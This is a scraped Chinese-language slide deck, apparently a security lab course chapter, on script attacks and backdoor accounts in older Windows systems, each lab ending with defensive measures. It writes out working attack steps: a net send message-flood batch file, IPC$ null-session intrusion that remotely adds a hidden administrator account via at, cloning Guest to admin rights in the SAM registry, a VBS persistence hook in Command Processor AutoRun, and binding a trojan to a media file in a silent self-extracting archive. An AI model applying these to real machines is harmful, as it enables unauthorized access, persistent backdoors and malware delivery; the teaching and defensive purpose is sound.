1 / 101

第 5 章 脚本攻击与后门帐号的建立

第 5 章 脚本攻击与后门帐号的建立. 实验 5-1 :死循环消息脚本攻击. 一、实验目的 二、实验设备 三、实验步骤 四、实验小结 五、防御措施. 实验 5-1 :死循环消息脚本攻击. 很多时候,我们会发现在自己的主机上收到一个窗口,该窗口只有一个“确定”钮,该窗口既不能最小化也不能关闭,而且该窗口得到了操作的焦点,只能点击“确定”,而一旦我们点击“确定”钮,马上又弹出一个一模一样的新窗口。该窗口就是死循环窗口,会消耗尽我们的内存。这是在 Windows 操作系统默认情况下,利用了 Messenger 服务自动启动的漏洞来实施攻击的。. 一、实验目的.

ramla
Download Presentation

第 5 章 脚本攻击与后门帐号的建立

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 第5章 脚本攻击与后门帐号的建立

  2. 实验5-1:死循环消息脚本攻击 一、实验目的 二、实验设备 三、实验步骤 四、实验小结 五、防御措施

  3. 实验5-1:死循环消息脚本攻击 很多时候,我们会发现在自己的主机上收到一个窗口,该窗口只有一个“确定”钮,该窗口既不能最小化也不能关闭,而且该窗口得到了操作的焦点,只能点击“确定”,而一旦我们点击“确定”钮,马上又弹出一个一模一样的新窗口。该窗口就是死循环窗口,会消耗尽我们的内存。这是在Windows操作系统默认情况下,利用了Messenger服务自动启动的漏洞来实施攻击的。

  4. 一、实验目的 了解默认自动启动的Messenger服务的安全隐患,利用该安全隐患发动攻击。

  5. 二、实验设备 2台以上的Windows主机,一台主机A为Windows 2k Server,另一台主机B为Windows的操作系统(如果B机为非WIN2k的操作系统,需要保证“管理工具”中的messenger服务为启动状态)。

  6. 三、实验步骤 1、在A主机上建立一个名为999.bat的批处理文件,具体内容如下::againnet send * “hello” goto again 2、双击运行999.bat,结果是局域网中的所有主机均可收到死循环消息包,如图5-1。

  7. 图5-1 局域网中的主机收到死循环消息包

  8. 四、实验小结 本实验利用Messenger服务默认自动启动的特性,向局域网中的主机发死循环包,使得凡是开启Messenger服务的主机均无法正常运行,只能收到大量的死循环消息包。

  9. 五、防御措施 在受害机上将Messenger服务设置为禁用或停用,就收不到死循环消息包了。

  10. 实验5-2:利用IPC$实现管道入侵 一、实验目的 二、实验设备 三、实验步骤 四、实验小结 五、防御措施

  11. 实验5-2:利用IPC$实现管道入侵 IPC$(Internet Process Connection)是共享“命名管道”的资源。它是为了让进程间相互通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空连接而无需用户名与密码(对方机器必须开启IPC$共享,否则是连接不上的)。利用这个空连接,连接者还可以得到目标主机上的用户列表(不过负责目标主机的管理员会禁止导出用户列表的)。所谓IPC$漏洞,其实并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能。它打开了默认共享,即所有的逻辑盘(C$,D$,E$……)和系统目录Winnt(或Windows)下的Admin$。所有这些都是为了方便管理员的管理,但一些黑客会利用IPC$,访问共享资源、导出用户列表,并使用一些字典工具进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。

  12. 一、实验目的 了解默认设置的缺陷及安全隐患,掌握去掉这些安全隐患的配置方法。

  13. 二、实验设备 2台Windows主机,一台Windows XP机称为A机,另一台为Windows 2k Server称为B机(IP地址为192.168.0.250)。 主机B 主机A

  14. 三、实验步骤(1) 1、A机通过IPC$与B机建立连接。 (1)空连接:在A机上进入DOS命令行方式,敲入net use \\192.168.0.250\ipc$ “”:“”。其中,192.168.0.250是B机的IP。当空连接成功建立后,便可执行如下的操作(如果空连接不能成功建立,则先转(2)再做(1)中的①,②,③)。 ①使用net view \\192.168.0.250命令,查看B主机的共享资源,如图5-2。 图5-2 查看B机的共享资源 ②使用net time \\192.168.0.250命令,查看B主机的当前时间,如图5-3。 图5-3 查看B主机的当前时间 ③使用nbtstat -a 192.168.0.250命令,得到主机B的NetBIOS用户名列表,此命令需要B主机的NetBIOS支持,如图5-4。 图5-4 查看B主机的NetBIOS用户名列表 (2)A主机的DOS窗口中,输入net use \\192.168.0.250\ipc$ /user:administrator命令,以管理员身份与B机建立连接。如果屏幕提示需要输入口令,则输入B机管理员的口令,如图5-5。 图5-5 以管理员身份与B机相连

  15. 三、实验步骤(2) 2、若上一步骤成功,则可以在A机D盘上建立一个具有如下语句的批处理文件123.cmd (1)net user jqm /add (2)net localgroup administrators jqm /add

  16. 三、实验步骤(3) 3、通过网络拷贝的方法将123.cmd这个批处理文件拷贝至受害主机B的C盘根目录下。(网络拷贝命令为copy d:\123.cmd \\192.168.0.250\C$)

  17. 三、实验步骤(4) 4、在A主机上使用at命令让123.cmd文件在实验机的某一指定时间运行。 (1)net time \\192.168.0.250 (2)at \\192.168.0.250 11:00 c:\123.cmd,(图5-6 A机上使用at命令让B机在某一指定时间运行123.cmd文件。)。其中,11:00为程序运行时间。 (3)查看程序123.cmd是否已经在B主机上得到运行:使用at \\192.168.0.250命令,如果屏幕提示清单是空的表明批处理文件已经运行,(图5-7 查看123.cmd文件是否已经在B机上运行)。这样,在B机上便建立一个具有超级用户权限的名为jqm的用户帐号。

  18. 三、实验步骤(5) 5、在A机或者局域网范围内的其它主机上用jqm的用户身份可以与B机以管理员权限建立连接。连接成功后,就可以像使用自己主机一样使用B机的命令行。

  19. 四、实验小结 本实验是利用Windows系统默认开启的139端口(IPC$)、“Task Scheduler”服务、Lanmanserver服务(服务显示名称为Server)、Lanmanworkstation服务共同作用来完成的。对于黑客机来说,如果想与远程主机建立连接(不管是否是空连接),远程主机上的前三个服务缺一不可,黑客本机必须要开启Lanmanworkstation服务(服务显示名称为Workstation)才行。

  20. 五、防御措施 (1)受害主机上禁用task scheduler服务。 (2)可以选择下列方法中的任何一种,去掉IPC$。 ①在受害主机上选择“网上邻居”,右击->属性->本地连接->TCP/IP->高级-> “WINS”标签卡,选择禁用NetBIOS。对于Win2k服务器端来说,如果允许NetBIOS, 那么UDP的137、138端口, 以及TCP 的139、445端口将开放; 如果禁止NetBIOS,那么只有445端口开放,(图5-8 去掉IPC$)。可见,如果远程服务器没有监听139或445端口,那么IPC$连接是无法建立的。 ②受害主机的防火墙中禁用139端口。 ③受害主机上禁用NetLogon服务(网络登录服务)。 ④受害主机上禁用Lanmanserver服务(显示名为Server),它提供了 RPC 支持、文件、打印以及命名管道共享。IPC$依赖于此服务。 注意:对于黑客机,如果未启动Lanmanworkstation服务(它提供网络连接和通讯),那么就无法向网络中的其它主机发起连接请求(显示名为Workstation)。 ⑤在每台主机上建立一个名为123.cmd的批处理文件,写入net share IPC$ /del语句。并且把123.cmd拖入桌面上的“开始”菜单―>“所有程序”―>“启动”中。

  21. 实验5-3:在Windows中克隆管理员帐号 一、实验目的 二、实验设备 三、实验步骤 四、实验小结 五、防御措施

  22. 实验5-3:在Windows中克隆管理员帐号 众所周知,在Windows中对某个帐号赋予权限,最好的方法是让该帐号属于某个具有相应权限的组。不过,这样一来在计算机管理中是可以查看出来的。有没有方法既能让该帐号具有相应组的权限,又在计算机管理中无法让人发觉呢?克隆(隐形提权)是个不错的选择。克隆管理员帐户是指:在计算机上使一个不属于管理员组的帐号具有与管理员一样的权限。本例中将Guest帐号利用注册表克隆成具有管理员权限的帐号。

  23. 一、实验目的 了解并掌握如何对帐号进行克隆。

  24. 二、实验设备 1台以上的Windows操作系统主机,可以是Windows 2K Server/XP操作系统。如果是win2003 SERVER,最好是正式版(否则实验时需要将注册表SAM键旁边的security键设置管理员帐号完全控制权限);如果是XP,则只能是XP 的SP2以下版本。

  25. 三、实验步骤(1) 1、找到“开始”任务栏->运行->regedit。打开注册表编辑器之后依次展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users。注意:这里由于权限的问题,可能Sam下不会看到任何子键。此时在Sam键上点右键->权限->将Administrators的权限设置为完全控制,点“确定”后刷新一次注册表,Sam子键下的内容就会出现了,(图5-9 注册表中管理员帐号权限的对应项)。Administrator对应的项为“000001F4”,下面有两个二进制值:一个是“F”,一个是“V”。Guest的项为“000003ee”。

  26. 三、实验步骤(2) 2、分别将Administrator和Guest两项导出,分别命名为A.reg和G.reg,(图5-10 将注册表中的某些项导出)。

  27. 三、实验步骤(3) 3、用记事本将导出的两个.reg文件打开,将A.reg中“F”的内容全部复制,(图5-11 复制管理员权限)所示,并且粘贴到G.reg中“F”对应的内容,将原G.reg中“F”的内容全部替换掉。

  28. 三、实验步骤(4) 4、保存G.reg更改的内容并退出。

  29. 三、实验步骤(5) 5、双击G.reg,将其导入到注册表当中。至此便完成了将Guest克隆成具有管理员权限的帐户。重启机器后便可以Guest帐户登录系统,而且在“计算机管理”中查看到Guest帐户不属于管理员组,而且该帐户并没有被激活。

  30. 三、实验步骤(6) 6、验证:如果是一台机,则直接注销并以Guest帐号身份登录,发觉可以建其它用户帐号(证明其具有管理员权限)。如果在两台机器上验证,在另一台主机上则可使用Guest帐号登录至该机,并可以在该机上远程建立用户帐号。

  31. 四、实验小结 Windows操作系统中的任何配置在注册表中均能实现,本实验恰恰验证了这一点。在注册表中进行克隆的Guest帐号在计算机管理中无法查看出它属于管理员组的成员,但是它的确已经具有了管理员的权限。

  32. 五、防御措施 计算机的使用者需要经常查看本实验注册表中对应项的设置,查看是否有被克隆的管理员帐号。

  33. 实验5-4:建立不死帐号 一、实验目的 二、实验设备 三、实验步骤 四、实验小结 五、防御措施

  34. 实验5-4:建立不死帐号 在Windows操作系统默认情况下,Guest帐号是禁用的。可是很多时候,我们会发现自己主机的Guest帐号被莫名其妙地激活了。更为奇怪的是,我们将Guest帐号设置为禁用后不久,Guest帐号又处于激活状态,即Guest帐号成为了不死帐号。通过仔细研究发现这是因为在注册表中将Guest帐号激活语句与Cmd.exe程序的运行语句进行了关联的结果。

  35. 一、实验目的 了解并掌握注册表在帐号激活方面的作用。

  36. 二、实验设备 2台Windows主机,可以是Windows 2K Server 或XP。

  37. 三、实验步骤(1) 1、本机D盘根目录上建立名为123.vbs的文件,其内容如下: Dim wshSet wsh=CreateObject(“wscript.shell”)wsh.run “net user guest /active:yes”,0wsh.run “net user guest aaa”,0wsh.run “net localgroup administrators guest /add”,0

  38. 三、实验步骤(2) 2、将Guest帐号的激活语句与Cmd.exe程序的运行关联在一起:在注册表中找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor下的AutoRun键,双击它,在键值中设置为d:\123.vbs,关闭注册表,(图5-12 在注册表中设置关联操作)。 说明:修改注册表的作用是将Cmd程序与来宾帐号的激活语句进行关联。

  39. 三、实验步骤(3) 3、测试:运行123.vbs文件,管理员即使停用Guest帐号,但是只要在开始任务栏中运行Cmd.exe,则Guest帐号又被重新击活。

  40. 三、实验步骤(4) 4、推广:此实验可以推广到开启3389端口的主机上,客户端主机将服务器端主机的Guest设为不死帐号。

  41. 四、实验小结 本实验利用注册表将Cmd命令的执行与Guest帐号激活并加入管理员组的脚本文件关联在一起,使得Cmd命令每执行一次,Guest帐号就会被激活并具有管理员权限。

  42. 五、防御措施 经常检查“计算机管理”中Guest帐号的状态,并检查注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun下的设置。

  43. 实验5-5:利用脚本实现木马与多媒体文件的绑定实验5-5:利用脚本实现木马与多媒体文件的绑定 一、实验目的 二、实验设备 三、实验步骤 四、实验小结 五、防御措施

  44. 实验5-5:利用脚本实现木马与多媒体文件的绑定实验5-5:利用脚本实现木马与多媒体文件的绑定 很多人从网络中下载资源时,下载的文件是由两个或多个初始文件绑定(指最终形成的文件在运行时,参与绑定的几个文件也一并得到运行)形成的。将同一类型的文件绑定,可以使用如“开山文件合并器”之类的软件实现。如果想将两个不同类型的文件绑定,需要使用脚本。脚本是使用一种特定的描述性语言并依据一定的格式编写的可执行文件。脚本通常可以由应用程序临时调用并执行。将脚本文件与.zip(或者.rar)压缩文件的自解压特性相结合,可以实现将木马与多媒体文件绑定。

  45. 一、实验目的 掌握VBS脚本的基本编写,掌握不同文件类型的绑定方法。

  46. 二、实验设备 1台以上的Windows主机。我们还要准备一款木马,一个ico图标文件(媒体文件或图片文件的图标),安装rar压缩软件以及一个素材文件(一段动画,一首mp3,或一张图片都可以)。

  47. 三、实验步骤(1) 1、将用来迷惑目标的素材压缩成为123.rar文件,并将脚本文件、木马添加其中,(图5-13 压缩所有素材)。其中,脚本文件run.vbs的代码如下: dim shellset shell=CreateObject(“Wscript.Shell”)shell.run “cmd /c start %SystemRoot%\system32\123.mp3”,0WScript.Sleep 1000shell.run “cmd /c start %SystemRoot%\system32\setup.exe”,0 注意: (1)cmd /c的含义:执行 String指定的命令,然后停止。 (2)Start的含义:启动另一个窗口运行指定的程序或命令。

  48. 三、实验步骤(2) 2、双击123.rar文件,点击压缩软件工具条上的“自解压格式”钮,再选择“高级自解压选项”,如图5-14。 图5-14 将压缩包进行自解压设置

  49. 三、实验步骤(3) 3、在“常规”标签卡中,设解压路径为%systemroot%\system32\,解压后运行设为run.vbs(脚本文件),如图5-15。 图5-15 设置“常规”标签卡

  50. 三、实验步骤(4) 4、在“模式”标签卡中,在“安静模式”框架中设置“全部隐藏”,在“覆盖方式”框架中设置“覆盖所有文件”,如图5-16。 图5-16 设置“模式”标签卡

More Related